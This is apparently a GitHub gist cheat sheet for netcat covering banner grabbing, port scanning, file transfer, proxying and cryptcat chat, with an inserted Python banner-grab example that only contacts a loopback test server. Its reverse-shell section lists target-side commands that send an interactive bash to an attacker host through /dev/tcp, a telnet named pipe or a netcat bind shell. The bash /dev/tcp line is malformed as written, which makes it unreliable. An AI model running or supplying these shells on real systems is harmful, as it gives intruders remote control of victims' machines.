@sathwikv143
Created July 3, 2018 16:02
# Banner grabbing with NETCAT
nc <ip> <OpenPort> ⏎ HTTP/1.1 200 --> basic grab
nc <ip> <OpenPort> ⏎ auto grab on services other than web ports (they usually announce themselves on connect)
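The banner grab above, done in code instead of by hand: an added example (not from this gist) that connects, sends an optional probe, reads whatever the service says first, and pulls the status line and Server header out of an HTTP reply. It assumes a constructed loopback test server (`start_test_server`, with the fake `ConstructedServer/1.0` banner) so it runs offline; a non-HTTP banner yields `None` from the parser.

```python
import socket
import threading

# Constructed reply the loopback test server sends; stands in for a real web server.
FAKE_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: ConstructedServer/1.0\r\n"
                 b"Content-Length: 0\r\n\r\n")

def grab_banner(host, port, probe=b"HEAD / HTTP/1.0\r\n\r\n", timeout=2.0):
    """Connect, send a probe (what you would type after `nc <ip> <port>`),
    and return the first bytes the service sends. Empty bytes means silence."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:          # peer closed: banner is complete
                    break
                chunks.append(data)
        except socket.timeout:
            pass                      # service went quiet; return what we have
    return b"".join(chunks)

def parse_http_banner(raw):
    """Return {'status', 'server'} for an HTTP reply, or None if it is not HTTP."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    if not lines[0].startswith("HTTP/"):
        return None
    server = next((l.split(":", 1)[1].strip() for l in lines[1:]
                   if l.lower().startswith("server:")), "")
    return {"status": lines[0], "server": server}

def start_test_server(response=FAKE_RESPONSE):
    """Loopback listener (constructed) answering one connection with a canned reply."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))        # port 0: let the OS pick a free port
    srv.listen(1)
    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)           # consume the probe
            conn.sendall(response)
        srv.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    port = start_test_server()
    print(parse_http_banner(grab_banner("127.0.0.1", port)))
```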
# port scanning
nc -v -w 1 <ip> -z <port range>
"-w 1" ---> tells netcat to wait 1 second per port before giving up
"-z" ---> zero-I/O mode: only checks whether the port is open, sends no data, so the scan runs faster
"port range" ---> ex: 1-1000 or initPort-endPort
# reverse shell without netcat
# linux
1. with bash /dev/tcp
on target computer : "/bin/bash -i /dev/tcp/<AttackerIP>/<port> 0>&1 2<&1"
on attacker computer : "nc -l -n -vv -p <port>"
2. with telnet and backpipe
on target computer : "mknod backpipe p && telnet <attackerIp> <port> 0<backpipe | /bin/bash 1>backpipe"
on attacker computer : "nc -l -n -vv -p <port>"
3. with only backpipe
on target computer: "mknod /tmp/backpipe p; /bin/bash 0</tmp/backpipe | nc -l -p <port> 1>/tmp/backpipe"
on attacker computer: nc <targetIp> <port>
# play music over netcat
mp3 computer : "cat <mp3 file> | nc <speakerIp> <port>"
speaker computer : "nc -lp <port> | mpg123 -"
# file transfer
receiver : nc -vn -lp <port> > <fileName>
sender : nc -vn <receiveIp> <port> < <fileName>
# simpler way to transfer a single file
sender: "cat <file> | nc -l -p <port>"
receiver: "nc <senderIp> <port> > <file>"
# transfer whole directory
sender: "tar -cf - <folderName> | nc -l -p <port>"
receiver: "nc <senderIp> <port> | tar -xf -"
# netcat as proxy
nc -l -p <port> | nc www.google.com 80 | nc -l -p <anotherPort>
#######################################################
# cryptcat - same as netcat but encrypts the stream with a symmetric algorithm keyed by a shared password
# install with # sudo apt-get install cryptcat
# for simple chat
on host: "cryptcat -k <password> <ipOfOther> <port>"
on client: "cryptcat -k <password> -l -p <port>"